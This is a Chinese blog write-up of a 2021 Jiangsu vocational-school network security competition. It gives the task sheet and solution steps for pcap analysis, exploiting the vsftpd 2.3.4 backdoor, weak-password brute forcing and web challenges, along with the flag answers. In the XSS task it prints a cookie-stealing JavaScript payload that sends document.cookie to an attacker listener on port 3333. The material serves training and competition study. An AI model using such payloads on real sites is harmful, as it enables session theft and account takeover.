2021年江苏省职业院校技能大赛中职 “网络信息安全”赛项(超详细)

2023-11-06

一.江苏省竞赛任务书

一、竞赛时间
8:00—11:00 共计3小时
二、竞赛阶段
竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值
第①阶段:
单兵模式系统渗透测试
任务一:
攻击日志分析
任务二:
系统漏洞利用与提权
任务三:
代码审计
任务四:
web安全渗透测试
任务五:
Linux操作系统渗透测试
任务六:
端口扫描Python渗透测试

备战阶段 休息20分钟
第②阶段:
分组对抗 系统加固 15分钟
渗透测试 45分钟
三、竞赛任务书内容
(一)拓扑图
在这里插入图片描述
(二)第一阶段任务书

任务一:攻击日志分析
任务环境说明:
服务器场景:PYsystem0031
服务器场景操作系统:未知
服务器场景FTP用户名:anonymous 密码:空
1.从靶机服务器的FTP上下载attack.pcapng数据包文件,通过分析数据包attack.pcapng,找出黑客的IP地址,并将黑客的IP地址作为FLAG(形式:[IP地址])提交;(1分)
2.继续查看数据包文件attack.pacapng,分析出黑客扫描得到的靶机开放的端口,将靶机开放的端口作为FLAG(形式:[端口名1,端口名2,端口名3…,端口名n])从低到高提交;(1分)
3.继续查看数据包文件attack.pacapng,分析出黑客成功入侵后获得的操作系统的版本号,将操作系统的版本号作为FLAG(形式:[操作系统版本号])提交;(1分)
4.继续查看数据包文件attack.pacapng,分析出黑客成功入侵后执行的第一条命令,并将执行的第一条命令作为FLAG(形式:[第一条命令])提交;(1分)
5.继续查看数据包文件attack.pacapng,分析出黑客成功入侵后执行的第二条命令,并将执行的第二条命令作为FLAG(形式:[第二条命令])提交;(2分)
6.继续查看数据包文件attack.pacapng,分析出黑客成功入侵后执行的第二条命令的返回结果,并将执行的第二条命令返回结果作为FLAG(形式:[第二条命令返回结果])提交;(2分)

7.继续查看数据包文件attack.pacapng,分析出黑客成功入侵后执行的第三条命令的返回结果,并将执行的第三条命令返回结果作为FLAG(形式:[第三条命令返回结果])提交。(2分)

任务二:系统漏洞利用与提权
任务环境说明:
服务器场景:PYsystem0033
服务器场景操作系统:Ubuntu
服务器场景用户名:未知 密码:未知
1.使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交;(1分)
2.通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;(1分)
3.利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;(1分)
4.对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;(1分)
5.查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;(1分)
6.在Kali攻击机中查找可使用的漏洞源码,将找到的漏洞源码文件名作为FLAG(形式:[文件名])提交;(1分)
7.利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;(1分)(2分)
8.利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。(2分)

任务三:代码审计
任务环境说明:
服务器场景:PYsystem0035
服务器场景操作系统:未知
服务器场景用户名:未知 密码:未知
1.在渗透机Kali Linux中访问靶机服务器Web页面,注册账号并登陆,找到存在XSS执行漏洞的页面,将该页面中存在XSS执行漏洞的对象名作为FLAG提交;(2分)
2.构造Cookie反弹JS脚本,将该JS代码中使用的对象及方法作为FLAG(形式:对象.方法)进行提交;(2分)
3.在渗透机Kali Linux中重启Web服务,将重启使用的命令作为FLAG进行提交;(2分)
4.在靶机服务器中利用原有的XSS漏洞调用上述JS脚本,在渗透机Kali Linux中开启3333端口监听,将开启端口监听使用的命令作为FLAG提交;(2分)
5.在渗透机Kali Linux中开启3333端口监听,将开启端口监听后接收回应的第一行的第一个单词作为FLAG提交;(2分)
6.在渗透机Kali Linux中开启3333端口监听,将开启端口监听后接收回应的第五行的最后一个单词作为FLAG提交。(2分)

任务四:Web安全渗透测试
任务环境说明:
服务器场景:PYsystem0043
服务器场景操作系统:未知
服务器场景用户名:未知 密码:未知
1.通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分)
2.通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分)
3.通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分)
4.通过浏览器访问http://靶机服务器IP/4,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(3分)
5.通过浏览器访问http://靶机服务器IP/5,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交。(3分)

任务五:Linux操作系统渗透测试
任务环境说明:
服务器场景:PYsystem0040
服务器场景操作系统:未知
服务器场景用户名:未知 密码:未知
1.通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;(1分)
2.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;(1分)
3.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;(1分)
4.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;(1分)
5.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;(2分)
6.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;(1分)
7.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;(2分)
8.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;(1分)
9.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。(2分)

任务六:端口扫描Python渗透测试
任务环境说明:
服务器场景:PYsystem0041
服务器场景操作系统:未知
服务器场景FTP用户名:anonymous 密码:空
1.从靶机服务器的FTP上下载PortScan.py,编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F1字符串,将该字符串作为Flag值提交;(1分)
2.继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F2字符串,将该字符串作为Flag值提交;(1分)
3.继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F3字符串,将该字符串作为Flag值提交;(1分)
4. 继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F4字符串,将该字符串作为Flag值提交;(2分)
5. 继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F5字符串,将该字符串作为Flag值提交;(2分)
6. 继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F6字符串,将该字符串作为Flag值提交;(2分)
7. 继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F7字符串,将该字符串作为Flag值提交;(2分)
8. 继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F8字符串,将该字符串作为Flag值提交;(2分)
9. 继续编辑Python程序PortScan.py,实现基于TCP全开的端口扫描,填写该文件当中空缺的F9字符串,将该字符串作为Flag值提交。(1分)

二.任务书解析:

任务一: 攻击日志分析

1.筛选HTTP协议

在这里插入图片描述
可以知道服务器是192.168.10.103 黑客ip是192.168.10.106

flag:192.168.10.106

2.使用过滤规则 :ip.src == 192.168.10.106 and tcp.flags.reset == 1

在这里插入图片描述

flag:21,22,23,80,139,445,3306,8080

3.尝试了http协议 发现黑客不是通过80端口进去的 所以什么都没找到继续筛选FTP协议 发现FTP的版本是2.3.4 怀疑是笑脸 ctrl+F 搜关键字6200

在这里插入图片描述
选中一条查看tcp数据流 发现了操作系统的版本 还有黑客执行的命令
在这里插入图片描述

flag:Linux localhost.localdomain 2.6.32-504.el6.i686

4.黑客成功入侵后执行的第一条命令,并将执行的第一条命令作为FLAG

flag:id

5.黑客成功入侵后执行的第二条命令,并将执行的第二条命令作为FLAG

flag:uname -a

6.黑客成功入侵后执行的第二条命令的返回结果,并将执行的第二条命令返回结果作为FLAG

flag:Linux localhost.localdomain 2.6.32-504.el6.i686 #1 SMP Wed Oct 15 03:02:07 UTC 2014 i686 i686 i386 GNU/Linux

7.黑客成功入侵后执行的第三条命令的返回结果,并将执行的第三条命令返回结果作为FLAG

flag:/

任务二:系统漏洞利用与提权
1.使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交;
在这里插入图片描述

21,22,80

2.通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;(1分)

使用msf进行 弱口令字典爆破 账号和密码 设置一些基本参数 运行即可

在这里插入图片描述

ubuntu,admin123

在这里插入图片描述
没有渗透机所以也不知道可以用的漏洞名字叫啥 答案给的upstream44
在这里插入图片描述
在这里插入图片描述

任务三:代码审计
在这里插入图片描述

先注册一个账号,然后进行登入,登入成功后 点击“个人中心”,我们可以修改自己的用户信息
尝试将姓名修改为JavaScript脚本,验证是否能执行XSS操作:

<script>alert(‘XSS’)</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

正常的话 有权限的话会执行XSS语句 说明存在xss漏洞
在这里插入图片描述

再次修改名字 <script>alert(document.cookie)</script>

在这里插入图片描述

dcument.cookie可以获取受害者浏览器的Cookie信息,利用者一旦窃取到受害者的Cookie信息,就可以利用受害者的Cookie信息登录受害者的账户。

在这里插入图片描述

构造cokie:document.write(<img src=”http://172.16.5.106:3333/xss?val=’ + document.cookie + ‘” width=0 height=0 />);

新建一个x.js 把这个payload 写进去,然后继续修改名字 把写好的js脚本传进去,开始监听端口
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
以管理员身份进入“用户管理”页面,看到用户姓名白了,代表我们的脚本已经被执行了
在这里插入图片描述

任务四:Web安全渗透测试
1.访问/1/ 是一个在闪的gif的图片 直接另存为即可查看
在这里插入图片描述
在这里插入图片描述

flag{asdasxcsdsdqasdxsfdsdacsasvsadsadvvasdsgwqdsadsadsdfsgsad}

2.访问/2/ 是一个签到题 访问 robots.txt 有个flag.php 访问即可获取flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

flag{kmbgsavdhsadsd}

3.访问/3/ 抓包修改 X-Forwarded-forUser-Agent Send一下即可获取flag。
在这里插入图片描述
在这里插入图片描述

flag{oibsnfsahjgubvsaujfbcsajhdsad}

4.访问/4/一个搜索框限制html长度 修改前端代码 改了长度还是不行 因为有个input中个disabled 他是用来禁止元素的 需要删除这个
在这里插入图片描述
在这里插入图片描述

flag{dadsadsagzcxcdgx}

5.访问/5/ 是有一个数据包 筛选http 协议 搜索POST 的请求
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

flag{ffb7567a1d4f4abdffdb54e022f8facd}

任务五:Linux操作系统渗透测试

1.使用nmap -sS -sV 172.16.5.46 (靶机ip是内网ip)
在这里插入图片描述

vsftp 2.3.4

2.有个高端口尝试连接 发现进不去,那就试一下比较老的笑脸吧(很久没考了)
在这里插入图片描述
在这里插入图片描述
改个密码 然后ssh 连接 这样方便一点 nc很多事情做不了
在这里插入图片描述
3. ftp 登入 靶机 然后使用 get 把.bmp 文件下载下来 使用fim 查看图片
在这里插入图片描述
4. cd /home/guest/
在这里插入图片描述
5. 还是 get 下载 或可以尝试别的方法 只要做出来即可 这个只是我的思路 可以参考。
在这里插入图片描述
在这里插入图片描述
6. 还是 get 下载
在这里插入图片描述
7. kaili 里面好像没有打开doc的软件 需要把他弄到网页上 然后 windows 访问下载看
在这里插入图片描述
在这里插入图片描述
8.查看/etc/passwd 发现了一个guset 用户 cat txt 内容在这里插入图片描述
在这里插入图片描述

任务六:端口扫描Python渗透测试
在这里插入图片描述
在这里插入图片描述

三.不懂的可以私信博主!

如需要环境的可以私信博主 可以交换环境 联系方式 QQ:3260344435

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

2021年江苏省职业院校技能大赛中职 “网络信息安全”赛项(超详细) 的相关文章

  • SQLi-Labs 学习笔记(Less 41-50)

    点击打开链接 Less 41 基于错误的POST型单引号字符型注入 先打开网页查看 Welcome Dhakkan 与之前讲的Less 40的区别 plain view plain copy sql SELECT FROM users WH
  • ctfshow-萌新-web1( 利用intval函数的特性获取敏感数据)

    ctf show 萌新模块的web1关 这一关考察的是intval 函数转换字符串时的特性以及SQL的拼接绕过 这一关直接就给了源码 并提示我们 id 1000 时 就是flag 先分析一下源码 首先是 intval 函数将参数id转换为数
  • 使用wireshark对HTTPS解密

    最近需要解析HTTPS流量 所以对wireshark的HTTPS解密进行了实测 使用wireshark解密https的方法 方法一 1 在wireshark的首选项中的protocols的tls选项里添加服务器私钥文件 p12文件需要填写密
  • ctfshow-网络迷踪-新手上路 ( 使用百度搜图收集景点信息)

    ctf show 网络迷踪模块第1关 只有一座桥的图片 拿到桥的名字即可 推荐使用百度搜图 先把图片下载到本地 使用百度搜图收集图片中的景点信息 根据搜图的结果可以发现 图片的来源均指向同一个地方 三亚蜈支洲岛 接下来 百度搜索 三亚蜈支洲
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1

    Vulnhub靶机Grotesque 3 0 1渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 信息收集 漏洞发现 LFI漏洞利用 本地文件包含漏洞 SSH登入 提权 获取FLAG Vulnhub靶机渗
  • 渗透系列之排序处产生的SQL注入问题

    1 在日常的测试过程中 发现系统的排序功能最容易产生sql注入 我们需要重点关注业务系统的排序功能 一般功能点对应这类字段 sortField sortOrder order orderby等 举个排序的SQL注入案例 发现系统的一个查询功
  • sqlmap详细使用介绍

    SQLmap介绍 sqlmap是一个自动化的SQL注入工具 其主要功能是扫描 发现并利用给定的URL进行SQL注入 目前支持的数据库有MySql Oracle Access PostageSQL SQL Server IBM DB2 SQL
  • 渗透测试——cookie注入

    1 cookie注入原理 Cookie最先是由Netscape 网景 公司提出的 Netscape官方文档中对Cookie的定义是这样的 Cookie是在HTTP协议下 服务器或脚本可以维护客户工作站上信息的一种方式 Cookie的用途非常
  • 使用Seay进行代码安全审计

    Seay介绍 Seay介绍 Seay其实是一款用 C语言所开发的一款对 PHP相关代码的安全审计系统 它是运 行在 Windows操作系统上的 这种软件能够发现 SQL 注入漏洞 代码执行漏洞 命令执行错误 文件内容包括 文件的上传 绕过防
  • 墨者靶场—SQL手工注入漏洞测试(MySQL数据库)

    0x00 前言 学SQL注入也有一段时间了 找了一个在线靶场 这个题目基本上学会最基本的注入原理和方法都能拿下 废话就不多说了 直接来演示吧 菜鸟渗透 大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Ngi
  • 2022年“网络安全”赛项驻马店市赛选拔赛 任务书

    2022年 网络安全 赛项驻马店市赛选拔赛 一 竞赛时间 共计3小时 二 竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段单兵模式系统渗透测试 任务一 Windows操作系统渗透测试 100分钟 100 任务二 Linux操
  • 浅谈逻辑漏洞中的越权访问漏洞

    越权漏洞 越权访问漏洞示意图 一 越权访问漏洞简介 1 类型 水平越权 通过更换的某个ID之类的身份标识 从而使A账号获得 增删查改 B账号的数据 垂直越权 使用低权限身份的账号 发送高权限账号的请求 获得其高权限的操作 未授权访问 通过删
  • HacksudoAliens

    HacksudoAliens arp scan interface eth0 192 168 1 0 24 nmap sC sV p sT 192 168 1 251 sS sT sA sW sM TCP SYN Connect ACK W
  • Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246)

    漏洞简介 RocketMQ 5 1 0及以下版本 在一定条件下 存在远程命令执行风险 RocketMQ的NameServer Broker Controller等多个组件外网泄露 缺乏权限验证 攻击者可以利用该漏洞利用更新配置功能以Rock
  • ctfshow-网络迷踪-初学再练( 一座雕像判断军事基地名称)

    ctf show 网络迷踪第4关 题目中只有一座雕像 需要根据雕像提交军事基地的名称 推荐使用谷歌识图 溯源到一篇博客 答案就在文章标题中 给了一座雕像 看样子不像是国内的风格 扔谷歌识图找找线索 访问谷歌识图 根据图片搜索 https w
  • DVWA安装配置教程

    原文传送门 http www cnblogs com yaochc p 5049832 html DVWA 安装教程 1 直接下载WampServer 免去了需要安装apache php mysql的服务器软件的痛苦 一体集成 相当于安装了
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

    Vulnhub靶机HarryPotter Aragog渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 漏洞发现 漏洞利用 数据库语句查询 SSH登入 备份文件提权
  • Gobuster工具详解

    目录 Gobuster工具介绍 主要特性 支持模式及全局参数列举 安装 使用 Dir模式 DNS模式 Vhost模式 fuzz模式 TFTP模式 S3 gcs模式 字典 docker运行gobuster Gobuster工具介绍 Gobus
  • Gobuster工具详解

    目录 Gobuster工具介绍 主要特性 支持模式及全局参数列举 安装 使用 Dir模式 DNS模式 Vhost模式 fuzz模式 TFTP模式 S3 gcs模式 字典 docker运行gobuster Gobuster工具介绍 Gobus
  • 小白入门黑客之渗透测试(超详细)基本流程(内附工具)

    经常会收到小伙伴们这样的私信 为什么我总是挖不到漏洞呢 渗透到底是什么样的流程呢 所以全网最详细的渗透测试流程来了 渗透测试其实就是通过一些手段来找到网站 APP 网络服务 软件 服务器等网络设备和应用的漏洞 告诉管理员有哪些漏洞 怎么填补

随机推荐

  • 关于java.lang.NullPointerException: Cannot invoke “org.springframework.data.redis.core.

    java lang NullPointerException Cannot invoke org springframework data redis core RedisTemplate opsForValue because this
  • 机器学习--特征缩放/均值归一化

    特征缩放 feature scaling 其中 特征缩放 feature scaling 大致的思路是这样的 梯度下降算法中 在有多个特征的情况下 如果你能确保这些不同的特征都处在一个相近的范围 这样梯度下降法就能更快地收敛 举个例子来说明
  • Linux中查看所有文件夹及包括文件大小之和

    如果想查看Linux中哪个文件夹最大 可以通过du sh 命令查询哪个文件夹最大 然后进入该文件夹继续执行该命令 直到找出最大的为止 1 Linux中查看所有文件夹和文件大小 这条命令将会计算该文件夹下所有文件大小总和 du sh 执行效果
  • 1、Reading Rasa Source Code —— main

    目录 main main 从 pypi 官方网站上下载 rasa 的最后一个释放版本 截止目前 最新版本为 2 2 1 的源码 解压后 在根目录下 找到 setup py 文件 这是安装引导程序 我们主要关注的是 entry points
  • TypeScript算法题实战——二叉搜索树篇

    二叉搜索树 也叫二叉查找树 二叉排序树 是具有下列性质的二叉树 若它的左子树不空 则左子树上所有结点的值均小于它的根结点的值 若它的右子树不空 则右子树上所有结点的值均大于它的根结点的值 注意 二叉搜索树中序遍历的结果是有序的 本系列博文将
  • 【Python】NMF非负矩阵分解算法(测试代码)

    目录 算法说明 百度百科 基本例程 总结 欢迎关注 Python 系列 持续更新中 欢迎关注 Python 系列 持续更新中 算法说明 百度百科 从多元统计的观点看 NMF是在非负性的限制下 在尽可能保持信息不变的情况下 将高维的随机模式简
  • 视频号5种提高曝光量的技巧

    在新开一个视频号 我们如何来尽可能吸引更多粉丝关注我们呢 在初期如何进行运营呢 我们先来看看现在视频号已知的一个机制 视频号虽然会依托位置 标签 话题等多维度信息进行智能分发 但目前最主 要传播还是靠基于微信生态形成的社交链 即当你的视频被
  • Hive和Hbase的对接

    引言 我们都知道hive数据存储在hdfs上 元数据可以存储在mysql中 计算框架采用mapreduce hive实际上只做分析工具 那么hive的数据是不是也可以存储在hbase呢 文章目录 一 配置hive 二 hive中数据与hba
  • C语言——创建文件

    创建文件 include
  • 俄罗斯方块(C++)

    目录 一 俄罗斯方块简易版的实现 1 图形的存储 2 图形的显示 3 图形的操作 4 碰撞检测 1 碰撞检测 移动 2 碰撞检测 旋转 5 消除整行 6 游戏结束 7 完整代码 二 俄罗斯方块简易版的升级 1 新增属性 2 更改初始化函数
  • CSS 定位(position) (三)

    叠放次序 z index 当对多个元素同时设置定位时 定位元素之间有可能会发生重叠 在CSS中 要想调整重叠定位元素的堆叠顺序 可以对定位元素应用z index层叠等级属性 其取值可为正整数 负整数和0 比如 z index 2 注意 z
  • 阿里云磁盘异常爆满的原因排查及解决方法

    阿里云磁盘异常爆满的原因排查及解决方法 网上搜了好多没有找到解决方法 第一步登录服务器 使用 df h 命令查看磁盘使用率 接下来逐步排查占用内存的文件 输入 du h 显示没有异常大文件 输入 du h max depth 1 后查到异常
  • 论文笔记之ST-GCN

    通过将图卷积网络扩展到时空图模型 设计了一种 用于动作识别的骨架序列 的通用表示 AAAI 2018 录用 论文地址 https arxiv org abs 1801 07455 1 摘要 动态人体骨架模型带有进行动作识别的重要信息 传统的
  • git clone项目报错,The requested URL returned error: 500

    git clone项目报错 The requested URL returned error 500 如何解决 试试修改电脑中存储的账号密码 有项目权限 至少在网页上能通过链接访问当前Git内容 曾在当前电脑登录过git账号 满足以上两种情
  • flutter 保存列表状态和控制列表状态

    class DiscoverActivePageState extends State
  • vue中列表渲染相关知识(v-for)

    普通的列表使用ul包含多个li实现 这样往往不够灵活 在原生js中能够动态渲染列表具体实现如下 ul ul 我们再看看vue中如何实现列表渲染的 b b
  • 微信小程序获取当前位置 地图定位导航-详细代码

    小程序获取当前位置 回到当前位置 地图定位 导航 效果 因为小程序更新了获取地理位置API接口 需要先在app json中配置一下permission字段 不然会报微信小程序getLocation 需要在app json中声明permiss
  • 扩展欧几里得算法

    扩展欧几里得算法是啥 那就要先知道什么是欧几里得算法 欧几里得算法 扩展欧几里得算法是欧几里得算法的推广 利用欧几里得算法的思想和递归求得贝祖等式a x b y gcd a b 不定方程中的一组x和y的解 原理如下 设a gt b 当b 0
  • Coqui TTS 安装与测试

    前言 本篇记录一下 Coqui TTS 的安装 Coqui TTS 的主要作者是德国人 这个库似乎之前和 Mozilla 的 TTS https github com mozilla TTS 有千丝万缕的关系 但是现在后者的 TTS 已经停
  • 2021年江苏省职业院校技能大赛中职 “网络信息安全”赛项(超详细)

    2021年中职组 网络空间安全 赛项 一 江苏省竞赛任务书 二 任务书解析 三 不懂的可以私信博主 一 江苏省竞赛任务书 一 竞赛时间 8 00 11 00 共计3小时 二 竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第 阶段